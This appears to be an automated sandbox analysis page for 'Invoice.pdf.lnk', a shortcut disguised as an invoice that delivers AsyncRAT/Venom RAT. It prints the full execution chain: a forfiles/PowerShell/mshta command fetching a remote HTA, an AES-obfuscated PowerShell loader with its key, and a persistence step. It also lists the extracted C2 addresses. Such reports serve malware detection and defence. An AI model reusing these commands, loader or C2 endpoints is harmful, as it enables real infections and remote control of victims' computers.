Overview

overview

10

Static

static

1

Invoice.pdf.lnk

windows7-x64

10

Invoice.pdf.lnk

windows10-1703-x64

10

Invoice.pdf.lnk

windows10-2004-x64

10

Invoice.pdf.lnk

windows11-21h2-x64

10

Analysis

  • max time kernel
    296s
  • max time network
    307s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    16-05-2024 14:34

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Invoice.pdf.lnk

  • Size

    148KB

  • MD5

    d39a73de9f109e3dba408e9481998206

  • SHA1

    30651dada81443db0fde9c3a336955d27b6d9024

  • SHA256

    84297536d9873d971dcc783ae2f95af8cbf32c65fccf3c8687af2ba5294b7f30

  • SHA512

    09c8954ecabbeb36aeb8804858168eb1448f5894c1641a1ba5311f2b33aaeb24814734d0b1f7e777f22910c53bb9df500801907a603d8d71fba139705f444d61

  • SSDEEP

    24:8WEe6Dz358m+pyAWkr+/4x+sPxZvBG0qdd79ds/Z6U/ab9Q9qFBm:8WENDzKvZbnvBG7dJ9A6U/a5QW

Score
10/10
asyncratdefaultdiscoverypersistencerat

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

https://invoiceinformations.com/InvoiceInfo/Evernote-Invoice

Extracted

Family

asyncrat

Version

Venom RAT + HVNC + Stealer + Grabber v6.0.2

Botnet

Default

C2

94.156.69.161:8900

94.156.69.161:4443

94.156.69.163:8900

94.156.69.163:4443

94.156.69.164:8900

94.156.69.164:4443

94.156.69.165:8900

94.156.69.165:4443

94.156.69.166:8900

94.156.69.166:4443

91.92.248.82:8900

91.92.248.82:4443

91.92.251.136:8900

91.92.251.136:4443

91.92.251.153:8900

91.92.251.153:4443

91.92.251.159:8900

91.92.251.159:4443

91.92.251.179:8900

91.92.251.179:4443
Mutex

sqhylkrhlwjrecxiv

Attributes
  • delay

    1

  • install

    false

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

    ratasyncrat
  • Blocklisted process makes network request 4 IoCs
  • Downloads MZ/PE file
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
    adwarespyware
  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 34 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\Invoice.pdf.lnk
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:452
    • C:\Windows\System32\forfiles.exe
      "C:\Windows\System32\forfiles.exe" /p C:\Windows /m write.exe /c "powershell . mshta https://invoiceinformations.com/InvoiceInfo/Evernote-Invoice"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1120
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        . mshta https://invoiceinformations.com/InvoiceInfo/Evernote-Invoice
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3812
        • C:\Windows\system32\mshta.exe
          "C:\Windows\system32\mshta.exe" https://invoiceinformations.com/InvoiceInfo/Evernote-Invoice
          4⤵
          • Blocklisted process makes network request
          • Checks computer location settings
          • Suspicious use of WriteProcessMemory
          PID:404
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function NDkpzB($PbutE){return -split ($PbutE -replace '..', '0x$& ')};$FgMPQtR = NDkpzB('3D2E22BEE13CCFE8B668DFE3870189AB65FC83A106ED0669AD4641C874CEFC917EC535ADDF89DF1FC0D291409C73E835B9F5E70CF0828A29B1A99FCA6F796F2A42503EAD3E20FB474BFCCBC35604C7DF567229A99309C37991C3C06D087F748ACC4BC05F5B87FDD9577382DC5E78E9AF8F258959DBD417148594A4E69F30F8BA09721A811C9154BF4F46C61B027E5E341F93E46D8A20C8C29F4EC25E5C686A83F3F134C5E02359C71996DDDA3CB61DC08A2EB6BE0D3BB39C00E9CD6C5B8E50425065FA05BE50EB58A186392882ABB24FD4D0628687F1E075817F6E330DC872782EC8EF3270D119F3F1EC86C7C67AB9FD26BF831DFCD080EFE275AD185384E578FB6FF21965BEBABF3D61F1298B71AA9FC44837B82550CF83C1CA66CF07FDD34B3A36310A571FD186CAA02874D83D539F0ED9044B8229A424D9B6082A7ACC921F90904F4DF72C046C6FD1C5F33D9111995AAD7C1C1DD1C2AB1663495AD4FA4A076957D6C02EA68AC2E44CCE5221002CB17CB5CE00989546834D261F7C9FEAF275945B6288E36BE0499F62C619DD95E5D74BCE21A67C9B3D7086F8A2BC180BC93D234878A2B0DE6149370967764D9A43A5B369191F8CA07CDA7F4C04EEA417515BBE36A47DB3F155508C8C012037E01E725505EA2CEF9DC3452A26D6CCCEEB8F53AB4E584DB03063509EDC34BD1631BC0D85131CD09FF34CB6F59C256EE3A3F103404A0F88BEE10B6013EBA9B9A71B168C53B1500E3EE8F5E3D826118E292F0BD55FDD0C5D4926161CC7FE9FB046F7A7A4BE387BF2C9A4CD81588044BB525721950179CD20BC45EDCF86DACC2D05515E4A58A7D4607A73C70D16BB5DF70BD51F26556B2B75F712CF6B33D805188BE16B94E6CF59787C2CAD2624B8DE1F1FD6555ADCD6B087438FE541F4E496F6A1A54088B41117481113DF53DEE84CA74EE438A319B822416D96A624AB4ADA351565AB1AB7910CB458083883D052E81D58BBD45FA51B2A392F60088ACC43D43965E09E3999B124A4D99742762C29FEE7420F1FEBEAA69BE53723E7C83A1A0A9AB74BD3474822C6D09A38219121F97EB315CC6A97AFFD96443F43BCCB405282E5D5F8C2E1607082372440DB310E54573087CA2C07CAD48324AAA6D911A31EBE54BC246CC77D449E0209925602A237BE857173875FF7CBDF566A584855FA36E7BA974C49E4AC6BA71F637954D6EC82596875886BD35B62A9C41EA16912E81F4625EFFEE2F5FCD66832EF3C439A748C8E6AA5C50B2992CA202119B2EBDB95ECE163FC8FF7B0501C611AFDCD510A004DE882C79B433EDD9B890926856A227E5785BA964677F025837F0C62EF77D4C9D609518E415D6DDC2396A5839D383F6432318DE07919F442E2D5D455313D4A5E6414B3670D6DA8A746844B6475984E7DC5722645FAE5C2734D64606B25DD735043ABF19ACE1D00CF1455D8DCB263FE49FF6DAF30B1D278A2B024AAFA5CD490FA75A3500718CB6C2D733C645F1D96145E4F47C3B9FFAB0A80D4806F9597AB6C16648E27BAE0DBAFEBCA1B9FC9CB65F38A195E4BF3C914D7EB77DF41FEBED9252B7AA6D055220D9B1BE5316F0934D2ACF837572E54605BB44920BC30963D120BE37D1424FC57F0BC5A94530924D42DB1D03E2DF2E25F9425495C81589DAB9FE1139AE45431DCCDE27404986F8ED2458E7515A420D2F40D110D146A7F3E0566F550A052B46A6AC139EBE3CC41082CAE82EC5846FEC3099D033661D49805ED48FE4F019ECC22D5684A78CE7960DA71ED832792147A535401F1498FAE1C2C4FAECFB4DA3EBF98E01C1B81D841AA94083C26C2E7AC676E83180756C3EC3BA39F08A527D5CA7063EA91228B210D40DA1428F93986B13C10BF132D27C85801CC49F8598B105227DB80FF777FB78B8D6537584E244FF98133C299B3DCD20BE4D4BEA88D068CDBD84F54F0E419FF9F730F7FC17BB140848191A0AE77DC3182584C1F0BBA1EFE230BA6F9BD64622D0EBB1B60D55C6DD5141BD03DC8E385CF9AD75D8CE161AD6433E790579D4C316320D3BF9B609ED9BC810E661092B5D2F824ECD168E1A288B1EC23A230DFEBD019DC175FE02FB070676A7482EAC99F984A1B33F24A05624DD8E8FE3B261186010881F43CBA3AF8581D0B62D6FD371276A0A6AC713BBF10E63835C647C6808C475CFDA4B5362CFB4709875D7C86AD7B698CE71A069C32FE65523E8D3E8C40DE1149F66CD1B651698F41D98DB91312BD04A1E012D728C2FB120EB74CFF9F93D064E541C8953EE17AAD25F9A2CE3116796F26552CF5C7F08B1B73411CB6622FBFC3A56EA8D19B6513611D36C25F7AC9428174BCC5D619DB2C87759D6E0C291582A50C887CD0E72F242760BC721B1271E4732B1FBEF23833AA9EE322D775365EDD7D0C2AF9E01C3492F003338D21E90287');$UcouF = [System.Security.Cryptography.Aes]::Create();$UcouF.Key = NDkpzB('415450574E64494F4F6C5A7742707268');$UcouF.IV = New-Object byte[] 16;$seVZtfGD = $UcouF.CreateDecryptor();$mamDBHAHL = $seVZtfGD.TransformFinalBlock($FgMPQtR, 0, $FgMPQtR.Length);$bZUJiekdW = [System.Text.Encoding]::Utf8.GetString($mamDBHAHL);$seVZtfGD.Dispose();& $bZUJiekdW.Substring(0,3) $bZUJiekdW.Substring(3)
            5⤵
            • Blocklisted process makes network request
            • Modifies registry class
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:4924
            • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
              "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Roaming\Evernote-Supplemental-Terms.pdf"
              6⤵
              • Checks processor information in registry
              • Modifies Internet Explorer settings
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of FindShellTrayWindow
              • Suspicious use of SetWindowsHookEx
              • Suspicious use of WriteProcessMemory
              PID:4680
              • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
                7⤵
                  PID:4988
                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                  "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
                  7⤵
                    PID:4224
                  • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                    "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
                    7⤵
                    • Suspicious use of WriteProcessMemory
                    PID:2744
                    • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                      "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=DF798C62D851F99D59E86D5962677E60 --mojo-platform-channel-handle=1760 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
                      8⤵
                        PID:4776
                      • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=A6BF09059D224386BA9602B2A7597FDD --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=A6BF09059D224386BA9602B2A7597FDD --renderer-client-id=2 --mojo-platform-channel-handle=1764 --allow-no-sandbox-job /prefetch:1
                        8⤵
                          PID:3580
                        • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                          "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=08076011535F7FE4AA6819D282FB1280 --mojo-platform-channel-handle=2292 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
                          8⤵
                            PID:4864
                          • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                            "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=8DEA74F09E220C9CBBB05FA1BF1AF252 --mojo-platform-channel-handle=2396 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
                            8⤵
                              PID:1124
                            • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                              "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=5320A72389F761D779067CBDFA07F29A --mojo-platform-channel-handle=1760 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
                              8⤵
                                PID:2336
                              • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=EF1448C09D3B4A6BA5B7CADA9AA17011 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=EF1448C09D3B4A6BA5B7CADA9AA17011 --renderer-client-id=8 --mojo-platform-channel-handle=1952 --allow-no-sandbox-job /prefetch:1
                                8⤵
                                  PID:1268
                              • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
                                7⤵
                                  PID:3944
                              • C:\Users\Admin\AppData\Roaming\windefragsvc.exe
                                "C:\Users\Admin\AppData\Roaming\windefragsvc.exe"
                                6⤵
                                • Executes dropped EXE
                                • Adds Run key to start application
                                • Suspicious use of SetThreadContext
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of AdjustPrivilegeToken
                                • Suspicious use of WriteProcessMemory
                                PID:464
                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                  7⤵
                                    PID:2932
                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                    7⤵
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious use of AdjustPrivilegeToken
                                    • Suspicious use of SetWindowsHookEx
                                    PID:404
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3976 --field-trial-handle=2276,i,11674642242468042059,14711253743544118298,262144 --variations-seed-version /prefetch:8
                        1⤵
                          PID:3604
                        • C:\Windows\System32\CompPkgSrv.exe
                          C:\Windows\System32\CompPkgSrv.exe -Embedding
                          1⤵
                            PID:4676

                          Network

                          MITRE ATT&CK Enterprise v15

                          Replay Monitor

                          Loading Replay Monitor...

                          Downloads

                          • C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages
                            Filesize

                            64KB

                            MD5

                            bf2aceeb9b9c1864a1a868cf16335948

                            SHA1

                            5fc243c3c9e2411064e8df4c0794ba3a5bb252c4

                            SHA256

                            6650122cddf96e19e1ba959a664cca249c3992b72b98607e98371ea28ec2044f

                            SHA512

                            39827dfe688a542cfe774745169fdbaedcdbb2106ccbd137a18bd172d8af11a859e7cb5daf2dd58073ebadaaa24be89aa5ba8e6e6af4b0ce22d6d5943b512600

                            Download Submit

                          • C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages
                            Filesize

                            36KB

                            MD5

                            b30d3becc8731792523d599d949e63f5

                            SHA1

                            19350257e42d7aee17fb3bf139a9d3adb330fad4

                            SHA256

                            b1b77e96279ead2b460de3de70e2ea4f5ad1b853598a4e27a5caf3f1a32cc4f3

                            SHA512

                            523f54895fb07f62b9a5f72c8b62e83d4d9506bda57b183818615f6eb7286e3b9c5a50409bc5c5164867c3ccdeae88aa395ecca6bc7e36d991552f857510792e

                            Download Submit

                          • C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages
                            Filesize

                            56KB

                            MD5

                            752a1f26b18748311b691c7d8fc20633

                            SHA1

                            c1f8e83eebc1cc1e9b88c773338eb09ff82ab862

                            SHA256

                            111dac2948e4cecb10b0d2e10d8afaa663d78d643826b592d6414a1fd77cc131

                            SHA512

                            a2f5f262faf2c3e9756da94b2c47787ce3a9391b5bd53581578aa9a764449e114836704d6dec4aadc097fed4c818831baa11affa1eb25be2bfad9349bb090fe5

                            Download Submit

                          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
                            Filesize

                            2KB

                            MD5

                            d85ba6ff808d9e5444a4b369f5bc2730

                            SHA1

                            31aa9d96590fff6981b315e0b391b575e4c0804a

                            SHA256

                            84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                            SHA512

                            8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                            Download Submit

                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                            Filesize

                            64B

                            MD5

                            235a8eb126d835efb2e253459ab8b089

                            SHA1

                            293fbf68e6726a5a230c3a42624c01899e35a89f

                            SHA256

                            5ffd4a816ae5d1c1a8bdc51d2872b7dd99e9c383c88001d303a6f64a77773686

                            SHA512

                            a83d17203b581491e47d65131e1efc8060ff04d1852e3415fc0a341c6a9691ef9f4cf4dd29d2f6d0032a49f2ba4bd36c35b3f472f0ce5f78f4bb139124760e92

                            Download Submit

                          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_iqeevjyd.ttg.ps1
                            Filesize

                            60B

                            MD5

                            d17fe0a3f47be24a6453e9ef58c94641

                            SHA1

                            6ab83620379fc69f80c0242105ddffd7d98d5d9d

                            SHA256

                            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                            SHA512

                            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                            Download Submit

                          • C:\Users\Admin\AppData\Roaming\Evernote-Supplemental-Terms.pdf
                            Filesize

                            70KB

                            MD5

                            508c98b92beb1aac53108149273aeb18

                            SHA1

                            434698e85e6bf7e1989212ce99d3b3e0a6b5171d

                            SHA256

                            861b8186ac5e7157ff17abe83c9aff3856113d43adf3bae520f93d75940c9c46

                            SHA512

                            08dfe9c8809bbf0ff03add0025a29e23834b9f37f926c1b9646e5cf217e690cd77872df90a8b2a71f18beb9334a547aa0eb2d26c1fcc423f95e1c19ee42d932f

                            Download Submit

                          • C:\Users\Admin\AppData\Roaming\windefragsvc.exe
                            Filesize

                            11.7MB

                            MD5

                            4cbf5db190e95e44d2a637e3513cb39f

                            SHA1

                            0f83db9b94d8d3975116732282364ee7aa8d142f

                            SHA256

                            84c2b21f5b3c48dfb7481094b8e7f8c2f56e041fe3244b1a608bc264d83536bb

                            SHA512

                            a4d0fb58ceabe86f7f3ce81624d7ab60fcde15bed4b928eaf03ed431230052b814d0a483b67ca42afa5dbb0fd9bb02043a6c52db4b980b6fde7d0357d5773193

                            Download Submit

                          • memory/404-128-0x00000000062B0000-0x000000000634C000-memory.dmp

                            Filesize

                            624KB

                            Download

                          • memory/404-129-0x0000000006350000-0x00000000063B6000-memory.dmp

                            Filesize

                            408KB

                            Download

                          • memory/404-69-0x0000000000400000-0x0000000000418000-memory.dmp

                            Filesize

                            96KB

                            Download

                          • memory/464-54-0x0000000000610000-0x00000000011D4000-memory.dmp

                            Filesize

                            11.8MB

                            Download

                          • memory/464-56-0x0000000005C70000-0x0000000005D02000-memory.dmp

                            Filesize

                            584KB

                            Download

                          • memory/464-55-0x0000000006180000-0x0000000006724000-memory.dmp

                            Filesize

                            5.6MB

                            Download

                          • memory/464-58-0x0000000005C20000-0x0000000005C2A000-memory.dmp

                            Filesize

                            40KB

                            Download

                          • memory/464-59-0x00000000089F0000-0x0000000008B76000-memory.dmp

                            Filesize

                            1.5MB

                            Download

                          • memory/464-64-0x0000000008B80000-0x0000000008F7E000-memory.dmp

                            Filesize

                            4.0MB

                            Download

                          • memory/3812-0-0x00007FFA05EA3000-0x00007FFA05EA5000-memory.dmp

                            Filesize

                            8KB

                            Download

                          • memory/3812-35-0x00007FFA05EA0000-0x00007FFA06961000-memory.dmp

                            Filesize

                            10.8MB

                            Download

                          • memory/3812-13-0x00007FFA05EA0000-0x00007FFA06961000-memory.dmp

                            Filesize

                            10.8MB

                            Download

                          • memory/3812-10-0x000001F7F8320000-0x000001F7F8342000-memory.dmp

                            Filesize

                            136KB

                            Download

                          • memory/4924-51-0x00000288EE2C0000-0x00000288EE2F5000-memory.dmp

                            Filesize

                            212KB

                            Download

                          • memory/4924-38-0x00000288EE2C0000-0x00000288EE2F5000-memory.dmp

                            Filesize

                            212KB

                            Download